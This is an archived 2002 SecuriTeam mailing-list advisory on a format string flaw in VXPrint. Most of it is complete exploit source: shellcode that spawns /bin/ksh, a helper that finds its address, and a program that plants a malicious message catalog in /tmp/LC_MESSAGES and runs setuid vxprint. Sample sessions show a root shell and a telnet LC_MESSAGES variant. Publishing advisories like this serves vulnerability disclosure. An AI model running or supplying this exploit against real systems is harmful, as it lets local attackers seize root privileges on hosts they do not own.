[EXPL] Format String Vulnerability in VXPrint Allows Gaining of Arbitrary Privileges
From: support@securiteam.comDate: 02/13/02
- Previous message: support@securiteam.com: "[NT] Unchecked Buffer in Telnet Server Could Lead to Arbitrary Code Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 13 Feb 2002 08:35:06 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Format String Vulnerability in VXPrint Allows Gaining of Arbitrary
Privileges
------------------------------------------------------------------------
SUMMARY
VXPrint, displays records from the Volume Manager configuration, a local
attacker can modify message catalog allowing him to exploit a format
string vulnerability in the product and execute arbitrary code.
DETAILS
Example:
$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7 16 ( 16 is offset )
..........(wait 30 minutes ). ......
# id
uid=0(root) gid=3(sys) ......................
Example:
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
....
login: blah blah..
password: blah.. blah..
..... (wait 30 minutes.. )
#
Exploit code:
------------------ expshell.c ------------------
#include <stdio.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x1a" /* jmp <shellcode+28> */
"\x33\xd2" /* xorl %edx,%edx */
"\x58" /* popl %eax */
"\x8d\x78\x14" /* leal 0x14(%eax),%edi */
"\x57" /* pushl %edi */
"\x50" /* pushl %eax */
"\xab" /* stosl %eax,%es:(%edi) */
"\x92" /* xchgl %eax,%edx */
"\xab" /* stosl %eax,%es:(%edi) */
"\x88\x42\x08" /* movb %al,0x8(%edx)
*/
"\x83\xef\x3b" /* subl $0x3b,%edi */
"\xb0\x9a" /* movb $0x9a,%al */
"\xab" /* stosl %eax,%es:(%edi) */
"\x47" /* incl %edi */
"\xb0\x07" /* movb $0x07,%al */
"\xab" /* stosl %eax,%es:(%edi) */
"\xb0\x0b" /* movb $0x0b,%al */
"\xe8\xe1\xff\xff\xff" /* call <shellcode+2> */
"/bin/ksh"
;
main(int argc, char *argv[])
{
char buff[1024];
sprintf(buff, "EGG=%s", shellcode);
putenv(buff);
putenv("LC_MESSAGES=/tmp");
system("/usr/bin/tcsh");
}
---------------------------------------------------------------
---------------- getret.c --------------------
main()
{
char *a;
a = getenv("EGG");
printf ("e=%p\n", a);
}
-----------------------------------------------
---------------- fmt_exp.c -----------------------------
#include <stdio.h>
#include "shellcode.h"
/* This is base of format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268
main(int argc, char *argv[])
{
FILE *fp;
char *retaddr;
long g_len, offset;
int count, count2, line=700, n=19;
if(argc < 2 || argc > 3) {
printf("Usage: %s ret-address offset\n", argv[0]);
exit(1);
}
retaddr = argv[1];
if(argc == 3) offset = atol(argv[2]);
else offset = 0;
g_len = strtol(retaddr, NULL, 16);
g_len -= BASE;
g_len += offset;
fp = fopen("testdef", "w+");
if(fp == NULL) {
fprintf(stderr, "can not open file.\n"); exit(1);
}
for(count=0; count<line; count++) {
for(count2=0; count2<n; count2++)
fprintf(fp, "%%10x");
fprintf(fp, "%%%dx%%n\n", g_len);
}
fclose(fp);
remove("testout");
system("mkmsgs testdef testout");
mkdir("/tmp/LC_MESSAGES", 0755);
system("mv testout /tmp/LC_MESSAGES/vxvm.mesg");
printf("ret addr = 0x%x\n", g_len);
/* this, also can any set uid command */
execl("/usr/sbin/vxprint", "vxprint", "---", NULL);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:jggm@mail.com> jGgM.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Unchecked Buffer in Telnet Server Could Lead to Arbitrary Code Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
